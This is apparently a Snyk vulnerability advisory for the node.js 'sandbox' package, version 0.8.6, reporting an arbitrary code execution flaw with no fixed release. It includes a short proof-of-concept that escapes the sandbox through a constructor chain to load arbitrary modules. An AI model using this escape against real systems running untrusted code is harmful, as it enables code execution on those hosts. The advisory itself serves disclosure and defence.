Homepage
About Snyk

sandbox@0.8.6 vulnerabilities

A nifty javascript sandbox for node.js

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the sandbox package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • C
Arbitrary Code Execution

sandbox is a nifty javascript sandbox for node.js.

Affected versions of the package are vulnerable to Arbitrary Code Execution. It is possible to escape the sandbox by using a combination of functions and constructors, allowing an attacker access to a process with root permissions, and load modules of their choosing in order to execute malicious code.

PoC by io Void:

new Function("
  return (
    this.constructor.constructor('
      return (this.process.mainModule.constructor._load
     )'
    )())"
  )()
("util").inspect("hi")

How to fix Arbitrary Code Execution?

There is no fix version for sandbox.

*
Go back to all versions of this package